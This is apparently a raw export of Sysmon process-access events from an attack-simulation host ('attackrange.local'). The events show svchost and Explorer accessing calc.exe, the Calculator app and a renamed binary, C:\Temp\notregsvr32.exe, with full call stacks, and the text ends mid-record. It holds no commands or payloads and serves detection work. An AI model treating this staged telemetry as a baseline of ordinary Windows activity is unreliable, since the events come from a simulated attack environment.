22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362114Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362113Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362112Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-337b-6013-8402-000000001100}16566064C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362111Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362110Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362109Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+1ca30|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000362108Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362107Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+1c8fa|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000362106Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+2aa9f|c:\windows\system32\capabilityaccessmanager.dll+1c8c2|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf 10341000x8000000000000000362105Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+2976b|c:\windows\system32\capabilityaccessmanager.dll+1c7d5|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000362104Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+2aa9f|c:\windows\system32\capabilityaccessmanager.dll+28ff4|c:\windows\system32\capabilityaccessmanager.dll+1c666|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480 10341000x8000000000000000362103Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362102Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-3708-6013-bb03-000000001100}5928C:\Temp\notregsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362101Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+310c0|C:\Windows\SYSTEM32\psmserviceexthost.dll+30dbf|C:\Windows\SYSTEM32\ntdll.dll+6ba5|C:\Windows\SYSTEM32\ntdll.dll+67f1|C:\Windows\SYSTEM32\ntdll.dll+6650|C:\Windows\SYSTEM32\ntdll.dll+305ac|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362100Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362099Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-337b-6013-8402-000000001100}16566064C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362098Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-3708-6013-bb03-000000001100}5928C:\Temp\notregsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362097Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362096Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362095Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362094Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362093Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362092Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.569{8e433fbf-337b-6013-8402-000000001100}165610428C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 